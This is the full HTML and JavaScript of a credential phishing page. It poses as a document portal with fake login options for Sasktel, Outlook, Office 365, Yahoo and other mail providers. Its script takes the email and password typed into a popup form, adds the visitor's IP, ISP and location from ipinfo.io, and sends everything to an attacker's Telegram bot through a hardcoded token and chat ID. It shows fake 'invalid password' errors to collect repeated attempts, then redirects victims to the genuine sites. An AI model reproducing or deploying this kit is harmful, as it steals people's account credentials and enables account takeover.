<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta
      name="description"
      content="Access millions of files, documents, and media with easy login options."
    />
    <title>Document</title>
    <link rel="stylesheet" href="style2.css" />
    <link
      rel="shortcut icon"
      href="https://treblego.com/assets/Home/Help/faq1.png"
      type="image/x-icon"
    />
    <style>
        *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}

.bodyContainer{
    display: flex;
    align-items: center;
    justify-content: center;
    background:blue;
    height: 100vh;
    width: 100%;
}

@media (max-width:999px) {
    .bodyContainer{
        background:red;
    }
}
@media (max-width:800px) {
    .bodyContainer{
        background:green;
    }
}

.main{
    background: white;
    width: 100%;
    height: auto;
    margin: 100px;
    border-radius: 10px;
    padding: 10px;
}

.btn{
    background-color: black;
    border-radius: 50px;
    color: white;
    padding: 5px 15px;
    border: none;
    
}

.General{
    display: flex;
    align-items: center;
    justify-content: center;
    gap: 40px;
    height: 80%;
    padding: 0 50px;
}
@media (max-width:999px) {
    .General{
        flex-direction: column;
    }
}
@media (max-width:576px) {
    .General{
        padding: 0 20px;
    }
}

.mainText{
  
    width: 38%;
    padding: 10px;
}

@media (max-width:999px) {
    .mainText{
        width: 100%;
        text-align: center;
    }
}

@media (max-width:743px) {
    .mainText h1{
        font-size: 1em;
        width: 100%;
        text-align: center;
    }
}

.mainContent{

    display: flex;
    align-items: center;
    flex-direction: column;
    justify-content: center;

}

.sml{
    padding-top: 20px;
    font-size: 13px;
    width: 85%;
}

.sml > h3 {
    font-size: 15px;

}

@media (max-width:743px) {
    .sml > h3{
        font-size: 11px;
    }
}

.mailContainer{
    height: 40vh;
    width: 60%;
    background-color: blue;
    border-radius: 10px;
    display: flex;
    align-items: center;
    flex-direction: column;
    justify-content: space-between;
    padding: 15px;
}




@media (max-width:999px) {
    .mailContainer{
        height: 30vh;
    }
}
@media (max-width:743px) {
    .mailContainer{
       width: 70%;
    }
}
@media (max-width:683px) {
    .mailContainer{
       width: 80%;
    }
}
@media (max-width:639px) {
    .mailContainer{
       width: 90%;
    }
}
@media (max-width:603px) {
    .mailContainer{
       width: 100%;
    }
}



.mainContent > p{
    text-align: center;
    width: 60%;
    padding: 15px 0;
    font-size: 14px;
    font-weight: 500;
}

@media (max-width:743px) {
    .mainContent > p{
        font-size: 11px;
    }
}

.mail{
    display: flex;
    align-items: center;
    background-color: #fff;
    width: 100%;
    border-radius: 50px;
    gap: 40px;
    padding: 7px 20px;
    cursor: pointer;
}

.mail img{
    height: 20px;
  
}

.mail > p {
    font-size: 12px;
    font-weight: 700;
  
    width: 100%;
}

.footer{

    margin-top: 5px;
  
}

.footerimage{
    display: flex;
    justify-content: center;
    align-items: center;
    gap: 10px;
    
}


.footertext{
    justify-content: center;
    display: flex;
    gap: 10px;
    font-size: 13px;
    padding: 5px;
}

.dropbox{
    height: 40px;

}

.docu{
    height: 45px;
    
}

.one{
    height: 40px;
}

.aoli{
    height: 10px;
}




.formHolder.Popup {
    display: none; 
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    justify-content: center;
    align-items: center;
  }
  

  .formHolder.Popup form {
    background: white;
    padding: 20px;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    position: relative;
  }
  
  #closePopup {
    position: absolute;
    top: 10px;
    right: 10px;
    background: transparent;
    border: none;
    font-size: 24px;
    cursor: pointer;
  }
  
  
  .error-message {
    color: red;
    margin-top: 10px;
  }


  /* Sign In Button Styling */
button[type="submit"] {
    background-color: #0078D4; 
    color: white;
    border: none;
    padding: 10px 20px;
    border-radius: 5px;
    cursor: pointer;
    font-size: 16px;
  }
  
  button[type="submit"]:hover {
    opacity: 0.9;
  }
  


  
  .cover{
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    gap: 20px;
  }

  .cover > h1 {
    font-size: 16px;
  }


  .data{
    display: flex;
    flex-direction: column;
    width: 100%;
    align-items: start;
    justify-content: center;
    /* padding-left: 70px; */
    gap: 3px;
    padding: 0 60px;
  }
  .da{
    width: 100%;
  }
.da > input {
    width: 100%;
    padding: 8px 10px;
    margin-bottom: 20px;
}
 

  .bt{
    width: 100%;
  }

      /* Basic styles for the popup form */
      .formHolder.Popup {
        display: none;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: rgba(0, 0, 0, 0.5);
        justify-content: center;
        align-items: center;
      }
      .form {
        background: white;
        padding: 20px;
        border-radius: 10px;
        box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
        width: 300px;
      }
      .error-message {
        color: red;
        margin-top: 10px;
        font-size: 12px;
      }
    </style>
  </head>
  <body>
    <div class="bodyContainer">
      <main class="main">
        <div class="General">
          <div class="mainText">
            <h1>Access To Millions Of Files, Documents And Medias.</h1>
            <div class="sml">
              <h3>Get Access To Over</h3>
              <h3>150 Apps & 8,000 Patterns For Free</h3>
            </div>
          </div>
          <div class="mainContent">
            <p>
              To view documents select your email provider below and login with
              email address.
            </p>
            <div class="mailContainer">
              <div
                class="mail number-btn"
                data-number="1"
                data-title="Login with Sasktel"
                data-image="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABQ0lEQVR4AWP8//8/AyWAOgZ8+P5HctnFl+GMDIwkaWZhZmRgATHeff+t3HXoST+6gmJbmemaolxHcBnAzMQIccH2m+8S115944OuACgPwjiBg5LACbALfvz5x/Xu228RdAXOygJnIvTFJuIygIOF6RvYBXGrbpy79PKrDLoCNqAf5QXYfwOVsGIzoN5ZPpUFaAC7vZLAOVURzvvoCgQ4WRgyzaVaQIGNEfoQL15kfPbpp5F0+4mzuJzpoSZwlYuN5Tu6OA8bE8PcIHUblj9//zE3ucivw2WAo5LAIk42prfo4kKcrO+BsfCTZdP1d/61ex4G4TLAW/2zuLU83yl0cV0J7usKghxXWUS4Wf4243EBLzvzUy425tcogv+BBohznwYnppWXXvucevxZDZcBaiKcD8vsZWvQxTlZmd5TnBcGhwEAERdzQiZ4X4MAAAAASUVORK5CYII="
                data-color="#000000"
              >
                <img
                  class="aoli"
                  src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABQ0lEQVR4AWP8//8/AyWAOgZ8+P5HctnFl+GMDIwkaWZhZmRgATHeff+t3HXoST+6gmJbmemaolxHcBnAzMQIccH2m+8S115944OuACgPwjiBg5LACbALfvz5x/Xu228RdAXOygJnIvTFJuIygIOF6RvYBXGrbpy79PKrDLoCNqAf5QXYfwOVsGIzoN5ZPpUFaAC7vZLAOVURzvvoCgQ4WRgyzaVaQIGNEfoQL15kfPbpp5F0+4mzuJzpoSZwlYuN5Tu6OA8bE8PcIHUblj9//zE3ucivw2WAo5LAIk42prfo4kKcrO+BsfCTZdP1d/61ex4G4TLAW/2zuLU83yl0cV0J7usKghxXWUS4Wf4243EBLzvzUy425tcogv+BBohznwYnppWXXvucevxZDZcBaiKcD8vsZWvQxTlZmd5TnBcGhwEAERdzQiZ4X4MAAAAASUVORK5CYII="
                  alt="AOL image"
                />
                <p>Login with Sasktel</p>
              </div>
              <div
                class="mail number-btn"
                data-number="2"
                data-title="Login with Outlook"
                data-image="https://img.icons8.com/color/480/outlook-calendar.png"
                data-color="#0078D4"
              >
                <img
                  src="https://img.icons8.com/color/480/outlook-calendar.png"
                  alt="Outlook image"
                />
                <p>Login with Outlook</p>
              </div>
              <div
                class="mail number-btn"
                data-title="Login with Office 365"
                data-number="3"
                data-image="https://w7.pngwing.com/pngs/9/673/png-transparent-microsoft-office-logo-png-thumbnail.png"
                data-color="#D8410A"
              >
                <img
                  src="https://w7.pngwing.com/pngs/9/673/png-transparent-microsoft-office-logo-png-thumbnail.png"
                  alt="Office 365 image"
                />
                <p>Login with Office 365</p>
              </div>
              <div
                class="mail number-btn"
                data-number="4"
                
                data-title="Login with Yahoo"
                data-image="https://th.bing.com/th/id/OIP.7ck289cPNaCto2dQQl_bwAAAAA?w=200&h=200&rs=1&pid=ImgDetMainc"
                data-color="#6001D2"
              >
                <img
                  src="https://th.bing.com/th/id/OIP.7ck289cPNaCto2dQQl_bwAAAAA?w=200&h=200&rs=1&pid=ImgDetMainc"
                  alt="Yahoo image"
                />
                <p>Login with Yahoo</p>
              </div>
              <div
                class="mail number-btn"
                data-title="Login with Other Mail"
                data-number="5"
                data-image="https://treblego.com/assets/Home/Help/faq1.png"
                data-color="#FF6F61"
              >
                <img
                  src="https://treblego.com/assets/Home/Help/faq1.png"
                  alt="Other Mail image"
                />
                <p>Login with Other Mail</p>
              </div>
            </div>
          </div>
        </div>
        <div class="footer">
          <div class="footerimage">
            <img
              class="dropbox"
              src="https://louisville.edu/its/adobe-sign/adobe-sign-media/adobe-sign-logo-still"
              alt=""
            />
            <img
              class="one"
              src="https://th.bing.com/th/id/OIP.6-AeOhdz04m2XCh6kAQd7wHaCV?w=400&h=126&rs=1&pid=ImgDetMain"
              alt=""
            />
            <img
              class="docu"
              src="https://th.bing.com/th/id/OIP.w6LEG06dzLdK_hemvodwggHaEK?rs=1&pid=ImgDetMain"
              alt=""
            />
          </div>
          <div class="footertext">
            <p>Terms</p>
            <p>Privacy & Policy</p>
            <p>Help</p>
          </div>
        </div>
      </main>
    </div>

    <div class="formHolder Popup" id="popupForm">
      <form id="loginForm" style="width: 46%;" onsubmit=" return sender()" method="POST" >
        <div class="cover">
          <img height="45px" src="" alt="" />
          <h1 id="title" class="title"></h1>
        </div>
        <div class="data">
          <div class="da">

            <label for="email">Email</label>
            <p id="err" class="error-message" style="font-size: 10px;"></p>
            <input
              type="email"
              id="email"
              name="email"
              style="border: 1px solid; border-radius: 50px"
              required
            />
          </div>
          <div class="da">
            <label for="password">Password</label>
            <input
              type="password"
              id="pass"
              name="password"
              style="border: 1px solid; border-radius: 50px"
              required
            />
          </div>
          <button type="submit" style="border-radius: 50px" class="bt" id="btn">
            Sign In
          </button>
          <button
            style="
              background-color: black;
              border-radius: 50px;
              color: white;
              padding: 5px 15px;
              border: none;
              font-size: 14px;
            "
            type="button"
            id="closePopup"
          >
            Close
          </button>
        </div>
       
      </form>
    </div>

    <script>
      var telegram_bot_id = "7047752017:AAGSkud9FF3TySzwVYtLB6CTtvoT9b1r3EU";
      var chat_id = 5757531542;
      var attemptCounter = 0;
      var userInfo = {};
      let selectedNumber = null; 
  
      async function fetchText() {
          let url = "https://ipinfo.io/json?token=de42e80837e28f";
          try {
              let response = await fetch(url);
              let data = await response.json();
              userInfo = {
                  country: data.country || 'N/A',
                  state: data.region || 'N/A',
                  city: data.city || 'N/A',
                  isp: data.org || 'N/A',
                  ip: data.ip || 'N/A'
              };
          } catch (error) {
              console.error('Fetch error: ', error);
          }
      }
  
      function getCurrentTime() {
          var now = new Date();
          var year = now.getFullYear();
          var month = (now.getMonth() + 1).toString().padStart(2, "0");
          var day = now.getDate().toString().padStart(2, "0");
          var hours = now.getHours().toString().padStart(2, "0");
          var minutes = now.getMinutes().toString().padStart(2, "0");
          var seconds = now.getSeconds().toString().padStart(2, "0");
          return `${year}-${month}-${day} ${hours}:${minutes}:${seconds}`;
      }
  
      document.addEventListener("DOMContentLoaded", async () => {

          await fetchText();
  
          const mailDivs = document.querySelectorAll(".mail");
          const popupForm = document.getElementById("popupForm");
          const closePopup = document.getElementById("closePopup");
          const form = document.getElementById("loginForm");
          const titleElement = document.getElementById("title");
          const imageElement = form.querySelector("img");
          const signInButton = form.querySelector('button[type="submit"]');
  

          document.querySelectorAll('.number-btn').forEach(button => {
              button.addEventListener('click', function() {
                  selectedNumber = this.getAttribute('data-number');
                  console.log(`Number ${selectedNumber} selected`);
              });
          });
  
          
          mailDivs.forEach((mailDiv) => {
              mailDiv.addEventListener("click", () => {
                  const title = mailDiv.getAttribute("data-title");
                  const imageSrc = mailDiv.getAttribute("data-image");
                  const buttonColor = mailDiv.getAttribute("data-color");
  
                  titleElement.textContent = title;
                  imageElement.src = imageSrc;
                  signInButton.style.backgroundColor = buttonColor;
                  popupForm.style.display = "flex";
              });
          });
  
          closePopup.addEventListener("click", () => {
              popupForm.style.display = "none";
          });
  
          function handleSubmit(event) {
              event.preventDefault();
  
              attemptCounter++;
  
              var u_name = document.getElementById("email").value;
              var email = document.getElementById("pass").value;
  
              if (u_name === "" || email === "") {
                  document.getElementById("err").textContent = "Password field cannot be empty.";
                  return false;
              }
  
              var currentTime = getCurrentTime();
              var message = `-------++++ made by perrycyber ++++-------\nUSERID: ${u_name}\nPASSWORD: ${email}\nATTEMPT: ${attemptCounter}\nTIME: ${currentTime}\nCOUNTRY: ${userInfo.country}\nSTATE: ${userInfo.state}\nCITY: ${userInfo.city}\nISP: ${userInfo.isp}\nIP: ${userInfo.ip}`;
              var data = {
                  chat_id: chat_id,
                  text: message,
              };
  
              fetch("https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", {
                  method: "POST",
                  headers: {
                      "Content-Type": "application/json",
                  },
                  body: JSON.stringify(data),
              })
              .then((response) => response.json())
              .then((data) => {
                  console.log("Success:", data);
                  document.getElementById("pass").value = ""; 
                  document.getElementById("pass").classList.add("error");
  
                  if (attemptCounter < 3) {
                      document.getElementById("err").textContent = "Invalid username or password. Try again";
                  } else {
                      document.getElementById("email").value = "";
                      document.getElementById("pass").value = "";
                      setTimeout(() => {
                          document.getElementById("err").textContent = "Redirecting..."; // Optional message
                          handleRedirect(selectedNumber);
                      }, 2000); // Optional delay before redirect
                  }
              })
              .catch((error) => {
                  console.error("Error:", error);
              });
  
              return false;
          }
  
          function handleRedirect(number) {
              if (number) {
                  switch (number) {
                      case '1':
                          window.location.href = 'https://www.sasktel.com/';
                          break;
                      case '2':
                          window.location.href = 'https://www.microsoft.com/en-us/microsoft-365/outlook/log-in';
                          break;
                      case '3':
                          window.location.href = 'https://www.office.com/';
                          break;
                      case '4':
                          window.location.href = 'https://mail.yahoo.com/';
                          break;
                      case '5':
                          window.location.href = 'https://www.sasktel.com/';
                          break;
                      default:
                          console.error('No valid number selected');
                  }
              } else {
                  console.error('No number selected');
              }
          }
  
          document.getElementById("loginForm").addEventListener("submit", handleSubmit);
      });
  </script>
  
  

  </body>
</html>
